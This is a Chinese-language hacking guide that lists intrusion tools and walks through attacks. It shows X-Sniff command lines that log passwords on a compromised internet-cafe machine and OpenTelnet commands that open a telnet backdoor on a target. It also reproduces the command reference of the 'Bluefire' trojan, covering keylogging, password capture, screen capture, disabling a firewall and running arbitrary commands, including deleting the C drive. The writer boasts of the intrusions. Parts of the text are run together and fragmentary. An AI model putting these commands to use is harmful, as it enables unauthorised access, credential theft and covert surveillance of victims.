常用黑客工具介绍

扫描类的有：流光X-waySuperScanX-Scan生成字典类的有：黑客字典字典专家超级字典生成器生日密码生成器嗅探监听类的有：X-SniffWinsniffARp-KillerARPSnifferMyNetmonNetXray键盘纪录类的有：广外幽灵血火代理和跳板类的有：代理猎手Snake后门类的有：HallhacktelnetBackDoorRmistallerwinshell蓝火Win2000/NT密码破解类的有：SMBCrack扫描类的就没什么讲的了都是有用户界面的。只要输入对方的ip进行扫描就行了。生成字典类也比较简单也有界面，他会要你选择用什么生成字典是纯数字呢？还是字母等等。嗅探类的我挑X-Sniff来说：X-Sniff可捕获局域网内FTP/SMTP/POP3/HTTP协议密码。运行参数说明：xsniff选项选项含义如下:-tcp:输出TCP数据报-udp:输出UDP数据报-icmp:输出ICMP数据报-pass:过滤密码信息-hide:后台运行-host:解析主机名-addrIP地址:过滤IP地址-port端口:过滤端口-log文件名:将输出保存到文件-asc:以ASCII形式输出-hex:以16进制形式输出比如：我入侵了xx网吧的Host(这时已经telnet上去了，哈哈！爽啊~~HOHOHO!)，输入：c:\xsniff.exe-hide-pass-logc:\winnt\pass.log这句话的意思是监听所有通过这台主机的密码(哈哈！比不一会什么邮箱账号，游戏账号一大把啊）。并把截获到的密码放在c:\winnt目录下的password文件中！键盘纪录的我比较喜欢用广外幽灵，他操作简单只要现在要纪录键盘的文件就行了。代理的代理猎手是进行大面积的扫描代理只要输入IP范围就ok了！后门类的我说说hacktelnet他有2个文件分别是OpenTelnet，ResumeTelnet。OpenTelnet是用来打开对方的telnet只有知道了对方的用户名和密码还有存在空连接就可以这样使用：OpenTelnet.exe\\IP帐号密码NTLM认证方式Telnet端口NTLM认证方式：0:不使用NTLM身份验证。1:先尝试NTLM身份验证。如果失败，再使用用户名和密码。2:只使用NTLM身份验证。(假设IP为192.168.1.1，用户名为admin，密码是：123456)c:\opentelnet\\192.168.1.1admin12345619000这样我们就可以:c:\telnet192.168.1.19000如果对方的密码为空可以这样：c:\opentelnet\\192.168.1.1admin19000另外那个ResumeTelnet是用来恢复Telnet配置的，并关闭Telnet服务器，它的用法：ResumeTelnet.exe\\ip帐号密码例如：c:\resumetelnet\\192.168.1.1admin123456这下就可以了！另外附带一下hall和蓝火的帮助文件。感兴趣的可以看看。蓝色火焰0.5Preview2版帮助文档==================================●注意：从本版本开始，蓝色火焰的服务端由配置器生成！！！^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^●使用本控制程序的基本条件是------有机器被你控制了，也就是说有机器被你装上了蓝色火焰服务端(由配置器生成的)！接下来，喜欢上bbs或者mud的朋友就容易得多了，你把那台机当成一个bbs或者mud就可以了，只是要注意：端口是19191简单点也行，跟着我来吧：你要做的很简单，就是打开windows(不一定哦)开始菜单-运行-输入telnetxxx.xxx.xxx.xxx19191这里xxx.xxx.xxx.xxx是你控制那台机的IP地址，怎么知道？$@#%#-----别问我哦，我也不知道哦。端口是固定的19191，如果连上(也就是你可以为所欲为的)，你就会看到如下画面:***************“蓝色火焰”服务器端.******************************版本:V0.5Preview2……****************************CopyrightbyVinsa,2001.10******Bluefire-这是蓝色火焰的提示符，本程式需要在这个提示符下输入命令，以达到远程控制目的========================================命令详解帮助：1help显示简要帮助信息2exit退出当前连接3ver显示版本信息4list列出当前进程5passwd列出记录的密码信息6clearpw清空记录的密码信息7sysinfo列出计算机的详细信息8halt挂起9screen运行屏幕保护程序10sice?检测是否运行了Soft-ice如果有就……11force注销当前用户12logoff注销13shutdown关机14reboot重启15poweroff强行关机----------------------------------------------------------16kill[ProcessID]杀死进程，格式如killfffec309其中fffec309是进程号，可以用list命令得到----------------------------------------------------------17hide[desktop/taskbar/start/trayicon/clock]隐藏……,如隐藏桌面：hidedesktop隐藏任务栏:hidetaskbar隐藏开始按钮:hidestart隐藏右下角图标:hidetrayicon隐藏时钟:hideclock----------------------------------------------------------18show[desktop/taskbar/start/trayicon/clock]显示……对应上面……----------------------------------------------------------19disable[mouse/desktop/task/taskbar/start/cad]锁定……锁定鼠标:disablemouse锁定桌面:disabledesktop锁定任务栏:disabletask锁定开始按钮:disablestart锁定Ctrl+Alt+delete:disablecad----------------------------------------------------------20enabled[mouse/desktop/task/taskbar/start/cad]把上面锁定的解锁----------------------------------------------------------21open[monitor/driver/ftp/http[dir]]打开……打开显示器：openmonitor打开光驱：opendriver打开Ftp服务器:openftp打开后就可以用各种ftp客户端控制，比如cuteFtp,leechftp,甚至Flashget的站点资源探素器都可以进行浏览和文件管理打开http服务器：openhttpc:\windows这样表示以c:\windows为主目录进行web发布，当然可以用IE,Netscape,Opera等等浏览器进行访问和下载文件★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★蓝色火焰0.4特色功能：这一功能充满着幻想，用虚拟Web页的形式实现了用浏览器(IE,Netscape,Opera等)：察看系统信息，察看(/清空)捕获的密码，^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^看(/清空)纪录的键盘，捕获屏幕，进程管理(列出/杀死进程)，关闭计算机等功能^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^相当于由一般的TCP/IP协议控制的木马转变成用http协议控制超级木马，可以绕过一些防火墙，呵呵^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^要openhttp然后就会出现控制选单!!!然后一切都这么简单！^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★也可以直接浏览捕获的屏幕图像---------------------------------------22close[monitor/driver/ftp/http]关闭……对应上面的---------------------------------------23catch[JpegFilename]捕获当前屏幕如catchc:\screen.jpg然后可以openhttpc:打开http服务器，在IE的地址栏里输入就可以浏览到屏幕图像^^^^^^^^^^^^^^^这些表示对方机器的IP地址openhttp打开IE输入[on/off]交换鼠标左右键changebon还原鼠标左右键changeboff---------------------------------------25charspy[result/on/off]查看击键记录:charspyresult禁止键盘记录:charspyoff开启键盘记录:charspyon(注意默认情况下已经开启)(记录各种按键，结果不存盘)---------------------------------------26keyspy[result/on/off/clear]查看击键记录:keyspyresult禁止键盘记录:keyspyoff开启键盘记录:keyspyon(注意默认情况下已经开启)清空键盘纪录:keyspyclear(这里和上面不同的是这里可以记录中文输入，并将结果存盘)-------------------------------------snapexe设置EXE文件关连28unsnapexe解除EXE文件关连---------------------------------------29bladd[filename]/blview/blclear黑名单管理(在关连了exe文件后黑名单生效)将程序加入黑名单用法：bladdregedit(禁用注册表编辑器)bladdskynet(禁用天网)bladdmsconfigbladdqq2000(这个太狠了，禁用oicq)bladdwindows(禁用windows目录下所有东西)bladd………………………………自己想加什么就加什么，看XXX不爽就bladdXXX查看当前黑名单blview清空当前黑名单blclear--------------------------------------30recstart[wavfilename]/recstop/recstate开始录制一段声音:recstartc:\test.wav结束录制:recstop显示录音机当前状态:recstate------------------------------------31cmd[doscommandline]运行dos命令:如cmddircmdtypec:\test.txtcmddelc:\